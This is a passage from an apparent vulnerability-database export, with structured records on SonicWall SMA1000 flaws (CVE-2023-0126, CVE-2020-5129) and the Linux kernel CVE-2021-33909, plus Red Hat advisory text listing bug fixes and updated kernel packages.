        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2023-0001"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-0126"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2023-0126/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "date": "2023-01-19T20:15:10.850000",
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "date": "2023-01-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-06-29T08:08:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "date": "2023-01-26T18:53:18.723000",
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "date": "2023-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SMA1000\u00a0 Path traversal vulnerability in firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ],
    "trust": 0.6
  }
}

var-202003-1521
Vulnerability from variot

A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier. SonicWall SMA100 is a secure access gateway device of American SonicWall company

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1521",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.1.0-06411"
      },
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": "12.1.0-06411"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sonicwall",
        "version": "\u003c=12.1.0-06411"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.1.0-06411",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      }
    ]
  },
  "cve": "CVE-2020-5129",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003422",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-20430",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003422",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5129",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003422",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-20430",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1629",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier. SonicWall SMA100 is a secure access gateway device of American SonicWall company",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5129",
        "trust": 3.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "id": "VAR-202003-1521",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      }
    ],
    "trust": 0.8111111099999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:56:05.709000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SNWLID-2020-0002",
        "trust": 0.8,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2020-0002"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-444",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5129"
      },
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2020-0002"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5129"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "date": "2020-03-26T13:15:13.327000",
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "date": "2020-03-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-07T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "date": "2020-03-30T17:29:50.863000",
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SonicWall SMA1000 HTTP Extraweb On the server  HTTP Request Smagling Vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "environmental issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ],
    "trust": 0.6
  }
}

var-202107-1361
Vulnerability from variot

fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 8.1) - ppc64le, x86_64

  1. Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.7) - ppc64, ppc64le, x86_64

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Bug Fix(es):

  • [RHEL7.9.z] n_tty_open: "BUG: unable to handle kernel paging request" (BZ#1872778)

  • [ESXi][RHEL7.8]"qp_alloc_hypercall result = -20" / "Could not attach to queue pair with -20" with vSphere Fault Tolerance enabled (BZ#1892237)

  • [RHEL7.9][s390x][Regression] Sino Nomine swapgen IBM z/VM emulated DASD with DIAG driver returns EOPNOTSUPP (BZ#1910395)

  • False-positive hard lockup detected while processing the thread state information (SysRq-T) (BZ#1912221)

  • RHEL7.9 zstream - s390x LPAR with NVMe SSD will panic when it has 32 or more IFL (pci) (BZ#1917943)

  • The NMI watchdog detected a hard lockup while printing RCU CPU stall warning messages to the serial console (BZ#1924688)

  • nvme hangs when trying to allocate reserved tag (BZ#1926825)

  • [REGRESSION] "call into AER handling regardless of severity" triggers do_recovery() unnecessarily on correctable PCIe errors (BZ#1933663)

  • Module nvme_core: A double free of the kmalloc-512 cache between nvme_trans_log_temperature() and nvme_get_log_page(). (BZ#1946793)

  • sctp - SCTP_CMD_TIMER_START queues active timer kernel BUG at kernel/timer.c:1000! (BZ#1953052)

  • [Hyper-V][RHEL-7]When CONFIG_NET_POLL_CONTROLLER is set, mainline commit 2a7f8c3b1d3fee is needed (BZ#1953075)

  • Kernel panic at cgroup_is_descendant (BZ#1957719)

  • [Hyper-V][RHEL-7]Commits To Fix Kdump Failures (BZ#1957803)

  • IGMPv2 JOIN packets incorrectly routed to loopback (BZ#1958339)

  • [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap [7.9.z] (BZ#1960193)

  • mlx4: Fix memory allocation in mlx4_buddy_init needed (BZ#1962406)

  • incorrect assertion on pi_state->pi_mutex.wait_lock from pi_state_update_owner() (BZ#1965495)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):

1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c 1902788 - CVE-2019-20934 kernel: use-after-free in show_numa_stats function 1961300 - CVE-2021-33033 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c 1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan 1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

ppc64: bpftool-3.10.0-1160.36.2.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.36.2.el7.ppc64.rpm kernel-devel-3.10.0-1160.36.2.el7.ppc64.rpm kernel-headers-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.ppc64.rpm perf-3.10.0-1160.36.2.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-3.10.0-1160.36.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1160.36.2.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-devel-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-headers-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.ppc64le.rpm perf-3.10.0-1160.36.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-3.10.0-1160.36.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1160.36.2.el7.s390x.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.s390x.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1160.36.2.el7.s390x.rpm kernel-devel-3.10.0-1160.36.2.el7.s390x.rpm kernel-headers-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-1160.36.2.el7.s390x.rpm perf-3.10.0-1160.36.2.el7.s390x.rpm perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm python-perf-3.10.0-1160.36.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.s390x.rpm

